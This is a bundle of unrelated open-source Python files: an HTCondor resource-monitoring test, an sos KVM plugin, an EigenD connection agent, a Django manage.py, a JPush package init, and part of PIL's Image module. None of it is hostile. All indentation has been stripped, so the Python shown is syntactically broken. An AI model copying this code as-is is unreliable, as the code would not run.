"STARTD_CRON_SQUIDs_MONITOR_EXECUTABLE": "$(TEST_DIR)/SQUID-monitor.py",
"STARTD_CRON_SQUIDs_MONITOR_MODE": "periodic",
"STARTD_CRON_SQUIDs_MONITOR_PERIOD": str(monitor_period),
"STARTD_CRON_SQUIDs_MONITOR_METRICS": "SUM:SQUIDs, PEAK:SQUIDsMemory",
"MACHINE_RESOURCE_INVENTORY_TAKOs": "$(TEST_DIR)/TAKO-discovery.py",
"STARTD_CRON_TAKOs_MONITOR_EXECUTABLE": "$(TEST_DIR)/TAKO-monitor.py",
"STARTD_CRON_TAKOs_MONITOR_MODE": "periodic",
"STARTD_CRON_TAKOs_MONITOR_PERIOD": str(monitor_period),
"STARTD_CRON_TAKOs_MONITOR_METRICS": "SUM:TAKOs, PEAK:TAKOsMemory",
"STARTD_CRON_JOBLIST": "$(STARTD_CRON_JOBLIST) SQUIDs_MONITOR TAKOs_MONITOR",
},
},
}
)
def the_config(request):
return request.param
@config
def slot_config(the_config):
return the_config["config"]
@config
def num_resources():
nr = next(iter(resources.values()))
assert all(number == nr for number in resources.values())
return nr
@standup
def condor(test_dir, slot_config):
for resource in resources.keys():
sequence = { f"{resource}{i}": j for i, j in enumerate(usages[resource]) }
discovery_script = format_script(discovery_script_for(resource, sequence))
write_file(test_dir / f"{resource}-discovery.py", discovery_script)
sequences = { f"{resource}{i}": j for i, j in enumerate(peaks[resource]) }
monitor_script = both_monitor_script(resource, sequence, sequences)
write_file(test_dir / f"{resource}-monitor.py", monitor_script)
with Condor(
local_dir=test_dir / "condor",
config={**slot_config, "TEST_DIR": test_dir.as_posix()},
) as condor:
# Ornithology will run condor_who to verify that all the daemons are running,
# but occasionally, not all slots will have made it to the collector
num_slots = int(slot_config["NUM_SLOTS"])
loop_count = 0
while num_slots != len(condor.status(ad_type=htcondor.AdTypes.Startd, projection=["SlotID"])):
loop_count = loop_count + 1
assert(loop_count < 20)
time.sleep(1)
yield condor
def the_job(test_dir, resources):
job_script = format_script( "#!/usr/bin/python3\n" + textwrap.dedent("""
import os
import sys
import time
elapsed = 0;
while elapsed < int(sys.argv[1]):""" +
"".join( f"""
os.system('condor_status -ads ${{_CONDOR_SCRATCH_DIR}}/.update.ad -af Assigned{resource}s {resource}sMemoryUsage')
""" for resource in resources
) +
"""
time.sleep(1)
elapsed += 1
""")
)
script_file = test_dir / "poll-memory.py"
write_file(script_file, job_script)
job_spec = {
"executable": script_file.as_posix(),
"arguments": "17",
"log": (test_dir / "events.log").as_posix(),
"output": (test_dir / "poll-memory.$(Cluster).$(Process).out").as_posix(),
"error": (test_dir / "poll-memory.$(Cluster).$(Process).err").as_posix(),
"getenv": "true",
"LeaveJobInQueue": "true",
}
for resource in resources:
job_spec[f"request_{resource}s"] = "2"
return job_spec
@action
def handle(test_dir, condor, num_resources):
handle = condor.submit(
description=the_job(test_dir, resources.keys()),
count=num_resources * 2
)
assert(handle.wait(verbose=True, timeout=180))
assert(condor.job_queue.wait_for_job_completion(handle.job_ids))
yield handle
handle.remove()
@action
def num_jobs_running_history(condor, handle, num_resources):
return track_quantity(
condor.job_queue.filter(lambda j, e: j in handle.job_ids),
increment_condition=lambda id_event: id_event[-1]
== SetJobStatus(JobStatus.RUNNING),
decrement_condition=lambda id_event: id_event[-1]
== SetJobStatus(JobStatus.COMPLETED),
max_quantity=num_resources,
expected_quantity=num_resources,
)
@action
def startd_log_file(condor):
return condor.startd_log.open()
@action
def num_busy_slots_history(startd_log_file, handle, num_resources):
logger.debug("Checking Startd log file...")
logger.debug("Expected Job IDs are: {}".format(handle.job_ids))
active_claims_history = track_quantity(
startd_log_file.read(),
increment_condition=lambda msg: "Changing activity: Idle -> Busy" in msg,
decrement_condition=lambda msg: "Changing activity: Busy -> Idle" in msg,
max_quantity=num_resources,
expected_quantity=num_resources,
)
return active_claims_history
class TestCustomMachineResources:
def test_correct_number_of_resources_assigned(self, condor):
for resource, number in resources.items():
result = condor.status(
ad_type=htcondor.AdTypes.Startd, projection=["SlotID", f"Assigned{resource}s"]
)
count = 0
for ad in result:
count += len(ad[f"Assigned{resource}s"].split(","))
assert(count == number)
def test_enough_jobs_running(
self, num_jobs_running_history, num_resources
):
assert (num_resources/2) in num_jobs_running_history
def test_never_too_many_jobs_running(
self, num_jobs_running_history, num_resources
):
assert max(num_jobs_running_history) <= (num_resources/2)
def test_enough_busy_slots(
self, num_busy_slots_history, num_resources
):
assert (num_resources/2) in num_busy_slots_history
def test_never_too_many_busy_slots(
self, num_busy_slots_history, num_resources
):
assert max(num_busy_slots_history) <= (num_resources/2)
def test_correct_uptimes_from_monitors(self, condor, handle):
for resource in resources.keys():
sequence = { f"{resource}{i}": j for i, j in enumerate(usages[resource]) }
sum_check_correct_uptimes(condor, handle, resource, sequence)
def test_correct_peaks_from_monitors(self, condor, handle):
for resource in resources.keys():
sequences = { f"{resource}{i}": j for i, j in enumerate(peaks[resource]) }
peak_check_correct_uptimes(condor, handle, resource, sequences)
def test_reported_usage_in_job_ads_and_event_log_match(
self, handle
):
for resource in resources.keys():
both_check_matching_usage(handle, resource)
| htcondor/htcondor | src/condor_tests/test_custom_machine_resource_instances.py | Python | apache-2.0 | 9,623 |
# Copyright (C) 2009 Red Hat, Inc., Joey Boggs <jboggs@redhat.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
from sos.plugins import Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin
import os
class Kvm(Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin):
"""Kernel virtual machine
"""
plugin_name = 'kvm'
profiles = ('system', 'virt')
debugfs_path = "/sys/kernel/debug"
_debugfs_cleanup = False
def check_enabled(self):
return os.access("/sys/module/kvm", os.R_OK)
def setup(self):
self.add_copy_spec([
"/sys/module/kvm/srcversion",
"/sys/module/kvm_intel/srcversion",
"/sys/module/kvm_amd/srcversion",
"/sys/module/ksm/srcversion"
])
if not os.path.ismount(self.debugfs_path):
self._debugfs_cleanup = True
r = self.call_ext_prog("mount -t debugfs debugfs %s"
% self.debugfs_path)
if r['status'] != 0:
self._log_error("debugfs not mounted and mount attempt failed")
self._debugfs_cleanup = False
return
self.add_cmd_output("kvm_stat --once")
def postproc(self):
if self._debugfs_cleanup and os.path.ismount(self.debugfs_path):
self.call_ext_prog("umount %s" % self.debugfs_path)
self._log_error("could not unmount %s" % self.debugfs_path)
# vim: set et ts=4 sw=4 :
| csutherl/sos | sos/plugins/kvm.py | Python | gpl-2.0 | 2,089 |
#
# Copyright 2009 Eigenlabs Ltd. http://www.eigenlabs.com
#
# This file is part of EigenD.
#
# EigenD is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EigenD is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EigenD. If not, see <http://www.gnu.org/licenses/>.
#
from pi.logic.shortcuts import *
from pi import action,logic,async,domain,agent
from plg_language import interpreter, interpreter_version as version
rules_conn = """
connect_contains(A,A).
connect_contains(A,B) :- @partof(B,A), @not(@protocol(explicit,B)).
connect_contains(A,B) :- @assocwith_direct(B,A), @not(@protocol(explicit,B)).
connect_isinput(O) :- @name(input,O).
connect_isinput(O) :- @protocol(input,O).
connect_isoutput(O) :- @name(output,O).
connect_isoutput(O) :- @protocol(output,O).
connect_inputs(W,OL) :- @is(OL,$alluniq(O,connect_contains(W,O),connect_isinput(O))).
connect_outputs(W,OL) :- @is(OL,$alluniq(O,connect_contains(W,O),connect_isoutput(O))).
connect_revoutputs(T,OL) :- @is(OL, $alluniq(O,connect_contains(T,O),connect_isoutput(O),@protocol(revconnect,O))).
connect_revinputs(F,OL) :- @is(OL, $alluniq(O,connect_contains(F,O),connect_isinput(O),@protocol(revconnect,O))).
connect_tosplit(T,OOUT,OIN) :- connect_inputs(T,OIN), connect_revoutputs(T,OOUT).
connect_fromsplit(F,OOUT,OIN) :- connect_outputs(F,OOUT), connect_revinputs(F,OIN).
find_connections(F,T,TL) :- @is(TL,$alluniq(O,connect_contains(T,O),@master(O,OM),connect_contains(F,OM))).
dump_contains(O,P) :- @assocwith_extended(PP,O), @partof(P,PP).
dump_connections0(P,T,P) :- @master(P,T).
dump_connections0(P,P,T) :- @master(T,P).
dump_connections(O,F,T) :- dump_contains(O,P),dump_connections0(P,F,T).
dump_connections(O,F,T) :- dump_connections0(O,F,T).
unconnect_candidate(T,[O,OM]) :- connect_contains(T,O),connect_isinput(O),@master(O,OM).
unconnect_candidate(T,[OM,O]) :- connect_contains(T,O),connect_isoutput(O),@protocol(revconnect,O),@master(OM,O).
unconnect_list(T,L) :- @is(L,$alluniq(O,unconnect_candidate(T,O))).
input_list_candidate(T,O) :- connect_contains(T,O),connect_isinput(O).
input_list_candidate(T,O) :- connect_contains(T,O),connect_isoutput(O),@protocol(revconnect,O).
input_list(T,L) :- @is(L,$alluniq([O,None],input_list_candidate(T,O))).
unconnect_from_candidate(T,F,[O,OM]) :- connect_contains(T,O),connect_isinput(O),@master(O,OM), connect_contains(F,OM).
unconnect_from_candidate(T,F,[OM,O]) :- connect_contains(T,O),connect_isoutput(O),@protocol(revconnect,O),@master(OM,O), connect_contains(F,OM).
unconnect_from_list(T,F,L) :- @is(L,$alluniq(O,unconnect_from_candidate(T,F,O))).
"""
class Stuff:
def __init__(self,id,words,ordinal=None,domain=None,channel=None,**extra):
self.id=id
self.words=words
self.ordinal=ordinal
self.domain=domain or domain.Null()
self.channel=channel
self.extra=extra
def get(self,key,val=None):
return self.extra.get(key,val)
def target(self,src,u):
return logic.render_term(logic.make_term('conn',u,self.channel,src.id,src.channel))
def __repr__(self):
return '<%s %s %s>' % (self.id,self.channel,self.words)
def __str__(self):
return repr(self)
class WordTable(dict):
def __init__(self,*words):
dict.__init__(self)
self.add(*words)
def add(self,*words):
for w in words:
w,s = self.__score(w)
self[w] = self.setdefault(w,0) + s
def __score(self,w):
mw,ml = self.__countstart(w,'+')
lw,ll = self.__countstart(w,'-')
if ml:
return mw,ml
if ll:
return lw,-ll
return w,1
def __countstart(self,w,c):
s = w.lstrip(c)
return s,len(w)-len(s)
def find_conn(aproxy,id):
cnxs = logic.parse_clauselist(aproxy.get_master())
r = []
for cnx in cnxs:
if logic.is_pred_arity(cnx,'conn',4) and cnx.args[2]==id:
r.append(logic.render_term(cnx))
return r
class Plumber(agent.Agent):
def __init__(self,master_agent,database,ordinal):
self.database = database
self.master_agent = master_agent
agent.Agent.__init__(self,names='plumber',subsystem='plumber',signature=version,container=1,protocols='is_subsys',ordinal=ordinal)
self.add_verb2(20,'connect([],None,role(None,[or([concrete],[composite([descriptor])])]),role(to,[concrete,singular]),option(using,[numeric,singular]))',self.verb_20_connect)
self.add_verb2(25,'connect([],None,role(None,[concrete,singular]))',self.verb_25_connect)
self.add_verb2(18,'connect([un],None,role(None,[concrete]))',self.verb_18_unconnect)
self.add_verb2(19,'connect([un],None,role(None,[concrete]),role(from,[concrete,singular]))',self.verb_19_unconnect_from)
self.add_verb2(12,'insert([],None,role(None,[concrete,singular]),role(to,[concrete,singular]))',self.verb_12_insert)
self.add_verb2(13,'insert([un],None,role(None,[concrete,singular]))',self.verb_13_uninsert)
def verb_12_insert(self,subject,i,o):
i = action.concrete_object(i)
o = action.concrete_object(o)
proxy = self.database.find_item(o)
if not proxy:
return async.failure('internal error: no proxy')
proxy.set_insert(i)
def verb_13_uninsert(self,subject,o):
o = action.concrete_object(o)
proxy = self.database.find_item(o)
if not proxy:
return async.failure('internal error: no proxy')
proxy.set_insert('')
@async.coroutine('internal error')
def __unconnect_from(self,t,tproxy,f):
objs = self.database.search_any_key('W',T('unconnect_from_list',t,f,V('W')))
for (s,m) in objs:
sproxy = self.database.find_item(s)
sconn = find_conn(sproxy,m)
for c in sconn:
print 'disconnect',c,'from',s
yield interpreter.RpcAdapter(sproxy.invoke_rpc('disconnect',c))
yield async.Coroutine.success()
@async.coroutine('internal error')
def __unconnect(self,t,tproxy):
print '__unconnect',t
objs = self.database.search_any_key('W',T('input_list',t,V('W')))
print '__unconnect',t,objs
for (s,m) in objs:
sproxy = self.database.find_item(s)
#sconn = self.find_conn(sproxy,m)
#for c in sconn:
# print 'disconnect',c,'from',s
# yield interpreter.RpcAdapter(sproxy.invoke_rpc('disconnect',c))
yield interpreter.RpcAdapter(sproxy.invoke_rpc('clrconnect',''))
yield async.Coroutine.success()
@async.coroutine('internal error')
def __unconnect_inputlist_from(self,t,tproxy,f):
print 'deleting',f,'inputs from',t
inputs = yield interpreter.RpcAdapter(tproxy.invoke_rpc('lstinput',''))
inputs = action.unmarshal(inputs)
print 'candidate inputs are:',inputs
for input in inputs:
print 'unconnecting',input
iproxy = self.database.find_item(input)
objs = self.database.search_any_key('W',T('unconnect_from_list',input,f,V('W')))
if objs:
yield self.__unconnect(input,iproxy)
print 'deleting input',input
yield interpreter.RpcAdapter(tproxy.invoke_rpc('delinput',input))
yield async.Coroutine.success()
@async.coroutine('internal error')
def __unconnect_inputlist(self,t,tproxy):
print 'deleting all inputs from',t
inputs = yield interpreter.RpcAdapter(tproxy.invoke_rpc('lstinput',''))
inputs = action.unmarshal(inputs)
print 'candidate inputs are:',inputs
for input in inputs:
print 'unconnecting',input
iproxy = self.database.find_item(input)
yield self.__unconnect(input,iproxy)
print 'deleting input',input
yield interpreter.RpcAdapter(tproxy.invoke_rpc('delinput',input))
yield async.Coroutine.success()
def verb_25_connect(self,subject,t):
t = action.concrete_object(t)
print 'dump connect',t
rv = self.get_connections(t)
for r in rv:
print r
def get_connections(self,id):
rv = []
db = self.database
for e in db.search(T('dump_connections',id,V('F'),V('T'))):
f = e['F']
t = e['T']
fd = db.find_full_desc(f) or f
td = db.find_full_desc(t) or t
us = db.get_inputs_channels(t,f)
for (u,c) in us:
d = '%s -> %s' % (fd,td)
if c: d = d+' channel %s' % (c)
if u: d = d+' using %s' % (u)
rv.append(d)
return rv
def verb_18_unconnect(self,subject,t):
print 'un connect',t
t = action.concrete_object(t)
tproxy = self.database.find_item(t)
if 'inputlist' in tproxy.protocols():
return self.__unconnect_inputlist(t,tproxy)
else:
return self.__unconnect(t,tproxy)
def verb_19_unconnect_from(self,subject,t,f):
f = action.concrete_object(f)
t = action.concrete_object(t)
print 'un connect',t,'from',f
tproxy = self.database.find_item(t)
if 'inputlist' in tproxy.protocols():
return self.__unconnect_inputlist_from(t,tproxy,f)
else:
return self.__unconnect_from(t,tproxy,f)
@async.coroutine('internal error')
def __connect_inner(self,t,f,u=None):
normoutputs = []
revoutputs = []
norminputs = []
revinputs = []
d = self.database.search_any(T('connect_tosplit',t,V('OOUT'),V('OIN')))
norminputs.extend([ self.__stuff(o) for o in d['OIN'] ])
revoutputs.extend([ self.__stuff(o) for o in d['OOUT'] ])
if action.is_concrete(f):
f = action.crack_concrete(f)
d = self.database.search_any(T('connect_fromsplit',f,V('OOUT'),V('OIN')))
revinputs.extend([ self.__stuff(o) for o in d['OIN'] ])
normoutputs.extend([ self.__stuff(o) for o in d['OOUT'] ])
else:
f = action.crack_composite(f,action.crack_descriptor)
print 'from=',f
for o,p in f:
d =self.database.search_any(T('connect_fromsplit',o,V('OOUT'),V('OIN')))
if d.get('OIN'):
revinputs.append(self.__stuff(o,channel=p))
else:
normoutputs.append(self.__stuff(o,channel=p))
print 'ni=',norminputs
print 'ro=',revoutputs
print 'no=',normoutputs
print 'ri=',revinputs
print 'u=',u
allinputs = norminputs+revinputs
alloutputs = normoutputs+revoutputs
if u is True:
iix = set()
for ii in allinputs:
iim = self.database.find_masters(ii.id)
for ii2 in iim:
iixm = self.database.get_inputs(ii.id,ii2)
iix = iix.union(iixm)
u = 1+reduce(max,iix,0)
print 'using',u,iix
if u == 0:
u = None
if len(allinputs)==1 and len(alloutputs)==1:
print 'direct connect'
self.__connect(alloutputs[0],allinputs[0],u)
yield async.Coroutine.success()
connections = []
for i in norminputs:
scores = {}
for o in normoutputs:
s = self.__score(o,i)
print o.id,'->',i.id,'score',s
if s[0]>0:
scores[s] = o
if not scores:
print i.id,'no inputs'
continue
best = max(scores.keys())
o = scores[best]
connections.append((o,i))
for i in revinputs:
scores = {}
for o in revoutputs:
s = self.__score(o,i)
print o.id,'->',i.id,'score',s
if s[0]>0:
scores[s] = o
if not scores:
print i.id,'no inputs'
continue
best = max(scores.keys())
o = scores[best]
connections.append((o,i))
if not connections:
yield async.Coroutine.failure('incompatible')
for (o,i) in connections:
self.__connect(o,i,u)
yield async.Coroutine.success()
@async.coroutine('internal error')
def __connect_outer(self,tproxy,f,u=None):
ret = [ ]
if 'inputlist' in tproxy.protocols() and u is not None:
yield async.Coroutine.failure('using and inputlist incompatible')
for f in action.arg_objects(f):
if 'inputlist' in tproxy.protocols():
ar = tproxy.invoke_rpc('addinput','')
yield ar
if not ar.status():
yield async.Coroutine.failure('addinput failed')
(t,n) = action.unmarshal(ar.args()[0])
print 'input list connect: new input is',t,n,'resyncing'
yield self.database.sync()
print 'resync complete'
if n:
ret.append(action.initialise_return(t))
etproxy = self.database.find_item(t)
else:
t = tproxy.id()
etproxy = tproxy
if u is None:
if 'using' in etproxy.protocols():
u=True
print 'connect2 from:',f
print '- to:',t
print '- using:',u
r = self.__connect_inner(t,f,u)
yield r
if not r.status():
yield async.Coroutine.failure(*r.args(),**r.kwds())
yield async.Coroutine.success(tuple(ret))
def verb_20_connect(self,subject,f,t,u):
if u is not None:
u=int(action.abstract_string(u))
t = action.concrete_object(t)
tproxy = self.database.find_item(t)
return self.__connect_outer(tproxy,f,u)
def __stuff(self,o,**extra):
proxy = self.database.find_item(o)
words = WordTable()
words.add(*[n for n in proxy.names() if n not in ['input','output']])
words.add(*proxy.fuzzy())
return Stuff(o,words,ordinal=proxy.ordinal(),domain=proxy.domain(),proxy=proxy,**extra)
def __score(self,ostuff,istuff):
ws = self.__score_words(ostuff.words,istuff.words)
os = self.__score_ordinals(ostuff.ordinal,istuff.ordinal)
ds = self.__score_domains(ostuff.domain,istuff.domain)
return (ws,os,ds)
def __score_words(self,owords,iwords):
s = 0
iw = set(iwords.keys())
ow = set(owords.keys())
if iw==ow:
return 5
both = ow.intersection(iw)
for w in both:
so = owords[w]
si = iwords[w]
ws = cmp(so,0)*cmp(si,0)*(abs(so)+abs(si))
s += ws
return s
def __score_domains(self,odomain,idomain):
if isinstance(odomain,domain.Null):
return -10
if isinstance(idomain,domain.Null):
return -10
if odomain.iso() and idomain==domain.BoundedFloat(-1,1):
return 2
return 0
def __score_ordinals(self,oord,iord):
if oord is not None and iord is not None and oord==iord:
return 1
return 0
def __connect(self,ostuff,istuff,u):
channel = ostuff.get('channel',None)
d=istuff.target(ostuff,u)
print 'connecting',d,'->',istuff.id,'using',u
istuff.get('proxy').invoke_rpc('connect',d)
@async.coroutine('internal error')
def unconnect_set(db,objs):
cnx=[]
for o in objs:
cn = db.get_subsys_masters(o)
for (ss,cl) in cn.items():
print o,ss,cl
if ss not in objs:
for c in cl:
cnx.append(c)
for (m,s) in cnx:
print m,'->',s
sproxy = db.find_item(s)
sconn = find_conn(sproxy,m)
for c in sconn:
print 'disconnect',c,'from',s
yield interpreter.RpcAdapter(sproxy.invoke_rpc('disconnect',c))
| Eigenlabs/EigenD | plg_language/builtin_conn.py | Python | gpl-3.0 | 16,737 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "punctuil_django.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| codefortulsa/punctuil | manage.py | Python | apache-2.0 | 258 |
"""Python package for using the JPush API"""
from .core import JPush
from .common import JPushFailure, Unauthorized
from .push import (
Push,
all_,
tag,
tag_and,
alias,
registration_id,
notification,
ios,
android,
winphone,
platform,
audience,
options,
message,
smsmessage,
)
from .device import (
Device,
add,
remove,
device_tag,
device_alias,
device_regid,
device_mobile,
)
from .report import (
Report,
ReportResponse,
)
from .schedule import (
Schedule,
schedulepayload,
)
__all__ = [
JPush,
JPushFailure,
Unauthorized,
all_,
Push,
tag,
tag_and,
alias,
registration_id,
notification,
ios,
android,
winphone,
message,
smsmessage,
platform,
audience,
options,
Device,
add,
remove,
device_tag,
device_alias,
device_regid,
Report,
ReportResponse,
Schedule,
schedulepayload,
]
__version__ = '3.2.1'
VERSION = tuple(map(int, __version__.split('.')))
# Silence urllib3 INFO logging by default
import logging
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)
| jpush/jbox | Server/venv/lib/python3.5/site-packages/jpush/__init__.py | Python | mit | 1,298 |
#
# The Python Imaging Library.
# $Id: Image.py 2812 2006-10-07 10:08:37Z fredrik $
#
# the Image class wrapper
#
# partial release history:
# 1995-09-09 fl Created
# 1996-03-11 fl PIL release 0.0 (proof of concept)
# 1996-04-30 fl PIL release 0.1b1
# 1999-07-28 fl PIL release 1.0 final
# 2000-06-07 fl PIL release 1.1
# 2000-10-20 fl PIL release 1.1.1
# 2001-05-07 fl PIL release 1.1.2
# 2002-03-15 fl PIL release 1.1.3
# 2003-05-10 fl PIL release 1.1.4
# 2005-03-28 fl PIL release 1.1.5
# 2006-10-07 fl PIL release 1.1.6b2
#
# Copyright (c) 1997-2006 by Secret Labs AB. All rights reserved.
# Copyright (c) 1995-2006 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
VERSION = "pil-lite"
try:
import warnings
except ImportError:
warnings = None
class _imaging_not_installed:
# module placeholder
def __getattr__(self, id):
raise ImportError("The _imaging C module is not installed")
try:
# If the _imaging C module is not present, you can still use
# the "open" function to identify files, but you cannot load
# them. Note that other modules should not refer to _imaging
# directly; import Image and use the Image.core variable instead.
import _imaging
core = _imaging
del _imaging
except ImportError, v:
core = _imaging_not_installed()
if str(v)[:20] == "Module use of python" and warnings:
# The _imaging C module is present, but not compiled for
# the right version (windows only). Print a warning, if
# possible.
warnings.warn(
"The _imaging extension was built for another version "
"of Python; most PIL functions will be disabled",
RuntimeWarning
)
import ImageMode
import ImagePalette
import os, string, sys
# type stuff
from types import IntType, StringType, TupleType
try:
UnicodeStringType = type(unicode(""))
##
# (Internal) Checks if an object is a string. If the current
# Python version supports Unicode, this checks for both 8-bit
# and Unicode strings.
def isStringType(t):
return isinstance(t, StringType) or isinstance(t, UnicodeStringType)
except NameError:
def isStringType(t):
return isinstance(t, StringType)
##
# (Internal) Checks if an object is a tuple.
def isTupleType(t):
return isinstance(t, TupleType)
##
# (Internal) Checks if an object is an image object.
def isImageType(t):
return hasattr(t, "im")
##
# (Internal) Checks if an object is a string, and that it points to a
# directory.
def isDirectory(f):
return isStringType(f) and os.path.isdir(f)
from operator import isNumberType, isSequenceType
#
# Debug level
DEBUG = 0
#
# Constants (also defined in _imagingmodule.c!)
NONE = 0
# palettes/quantizers
WEB = 0
ADAPTIVE = 1
# categories
NORMAL = 0
SEQUENCE = 1
CONTAINER = 2
# --------------------------------------------------------------------
# Registries
ID = []
OPEN = {}
MIME = {}
SAVE = {}
EXTENSION = {}
# --------------------------------------------------------------------
# Modes supported by this version
_MODEINFO = {
# NOTE: this table will be removed in future versions. use
# getmode* functions or ImageMode descriptors instead.
# official modes
"1": ("L", "L", ("1",)),
"L": ("L", "L", ("L",)),
"I": ("L", "I", ("I",)),
"F": ("L", "F", ("F",)),
"P": ("RGB", "L", ("P",)),
"RGB": ("RGB", "L", ("R", "G", "B")),
"RGBX": ("RGB", "L", ("R", "G", "B", "X")),
"RGBA": ("RGB", "L", ("R", "G", "B", "A")),
"CMYK": ("RGB", "L", ("C", "M", "Y", "K")),
"YCbCr": ("RGB", "L", ("Y", "Cb", "Cr")),
# Experimental modes include I;16, I;16B, RGBa, BGR;15,
# and BGR;24. Use these modes only if you know exactly
# what you're doing...
}
if sys.byteorder == 'little':
_ARRAY_ENDIAN = '<'
else:
_ARRAY_ENDIAN = '>'
_MODE_CONV = {
# official modes
"1": ('t8', None),
"L": ('|u1', None,),
"S": ('%su2' % _ARRAY_ENDIAN, None ),
"I": ('%si4' % _ARRAY_ENDIAN, None ),
"F": ('%sf4' % _ARRAY_ENDIAN, None),
"P": ('|u1', None),
"RGB": ('|u1', 3),
"RGBX": ('|u1', 4),
"RGBA": ('|u1', 4),
"CMYK": ('|u1', 4),
"YCbCr": ('|u1', 4),
}
def _conv_type_shape(im):
shape = im.size[::-1]
typ, extra = _MODE_CONV[im.mode]
if extra is None:
return shape, typ
else:
return shape+(extra,), typ
MODES = _MODEINFO.keys()
MODES.sort()
# raw modes that may be memory mapped. NOTE: if you change this, you
# may have to modify the stride calculation in map.c too!
_MAPMODES = ("L", "P", "RGBX", "RGBA", "CMYK", "S")
##
# Gets the "base" mode for given mode. This function returns "L" for
# images that contain grayscale data, and "RGB" for images that
# contain color data.
#
# @param mode Input mode.
# @return "L" or "RGB".
# @exception KeyError If the input mode was not a standard mode.
def getmodebase(mode):
return ImageMode.getmode(mode).basemode
##
# Gets the storage type mode. Given a mode, this function returns a
# single-layer mode suitable for storing individual bands.
#
# @param mode Input mode.
# @return "L", "I", or "F".
# @exception KeyError If the input mode was not a standard mode.
def getmodetype(mode):
return ImageMode.getmode(mode).basetype
##
# Gets a list of individual band names. Given a mode, this function
# returns a tuple containing the names of individual bands (use
# {@link #getmodetype} to get the mode used to store each individual
# band.
#
# @param mode Input mode.
# @return A tuple containing band names. The length of the tuple
# gives the number of bands in an image of the given mode.
# @exception KeyError If the input mode was not a standard mode.
def getmodebandnames(mode):
return ImageMode.getmode(mode).bands
##
# Gets the number of individual bands for this mode.
#
# @param mode Input mode.
# @return The number of bands in this mode.
# @exception KeyError If the input mode was not a standard mode.
def getmodebands(mode):
return len(ImageMode.getmode(mode).bands)
# --------------------------------------------------------------------
# Helpers
_initialized = 0
##
# Explicitly loads standard file format drivers.
def preinit():
"Load standard file format drivers."
global _initialized
if _initialized >= 1:
return
try:
import BmpImagePlugin
except ImportError:
pass
try:
import GifImagePlugin
except ImportError:
pass
try:
import JpegImagePlugin
except ImportError:
pass
try:
import PpmImagePlugin
except ImportError:
pass
try:
import PngImagePlugin
except ImportError:
pass
# try:
# import TiffImagePlugin
# except ImportError:
# pass
_initialized = 1
##
# Explicitly initializes the Python Imaging Library. This function
# loads all available file format drivers.
def init():
"Load all file format drivers."
global _initialized
if _initialized >= 2:
return
visited = {}
directories = sys.path
try:
directories = directories + [os.path.dirname(__file__)]
except NameError:
pass
# only check directories (including current, if present in the path)
for directory in filter(isDirectory, directories):
fullpath = os.path.abspath(directory)
if visited.has_key(fullpath):
continue
for file in os.listdir(directory):
if file[-14:] == "ImagePlugin.py":
f, e = os.path.splitext(file)
try:
sys.path.insert(0, directory)
try:
__import__(f, globals(), locals(), [])
finally:
del sys.path[0]
except ImportError:
if DEBUG:
print "Image: failed to import",
print f, ":", sys.exc_value
visited[fullpath] = None
if OPEN or SAVE:
_initialized = 2
# --------------------------------------------------------------------
# Codec factories (used by tostring/fromstring and ImageFile.load)
def _getdecoder(mode, decoder_name, args, extra=()):
# tweak arguments
if args is None:
args = ()
elif not isTupleType(args):
args = (args,)
try:
# get decoder
decoder = getattr(core, decoder_name + "_decoder")
# print decoder, (mode,) + args + extra
return apply(decoder, (mode,) + args + extra)
except AttributeError:
raise IOError("decoder %s not available" % decoder_name)
def _getencoder(mode, encoder_name, args, extra=()):
# tweak arguments
if args is None:
args = ()
elif not isTupleType(args):
args = (args,)
try:
# get encoder
encoder = getattr(core, encoder_name + "_encoder")
# print encoder, (mode,) + args + extra
return apply(encoder, (mode,) + args + extra)
except AttributeError:
raise IOError("encoder %s not available" % encoder_name)
# --------------------------------------------------------------------
# Implementation wrapper
##
# This class represents an image object. To create Image objects, use
# the appropriate factory functions. There's hardly ever any reason
# to call the Image constructor directly.
#
# @see #open
# @see #new
# @see #fromstring
class Image:
format = None
format_description = None
def __init__(self):
self.im = None
self.mode = ""
self.size = (0, 0)
self.palette = None
self.info = {}
self.category = NORMAL
self.readonly = 0
def _new(self, im):
new = Image()
new.im = im
new.mode = im.mode
new.size = im.size
new.palette = self.palette
if im.mode == "P":
new.palette = ImagePalette.ImagePalette()
try:
new.info = self.info.copy()
except AttributeError:
# fallback (pre-1.5.2)
new.info = {}
for k, v in self.info:
new.info[k] = v
return new
_makeself = _new # compatibility
def _copy(self):
self.load()
self.im = self.im.copy()
self.readonly = 0
def _dump(self, file=None, format='png'):
import tempfile
if not file:
file = tempfile.mktemp()
self.load()
file = file + "." + format
self.save(file, format)
return file
def __getattr__(self, name):
if name == "__array_interface__":
# numpy array interface support
new = {}
shape, typestr = _conv_type_shape(self)
new['shape'] = shape
new['typestr'] = typestr
new['data'] = self.tostring()
return new
raise AttributeError(name)
##
# Returns a string containing pixel data.
#
# @param encoder_name What encoder to use. The default is to
# use the standard "raw" encoder.
# @param *args Extra arguments to the encoder.
# @return An 8-bit string.
def tostring(self, encoder_name="raw", *args):
"Return image as a binary string"
# may pass tuple instead of argument list
if len(args) == 1 and isTupleType(args[0]):
args = args[0]
if encoder_name == "raw" and args == ():
args = self.mode
self.load()
# unpack data
e = _getencoder(self.mode, encoder_name, args)
e.setimage(self.im)
bufsize = max(65536, self.size[0] * 4) # see RawEncode.c
data = []
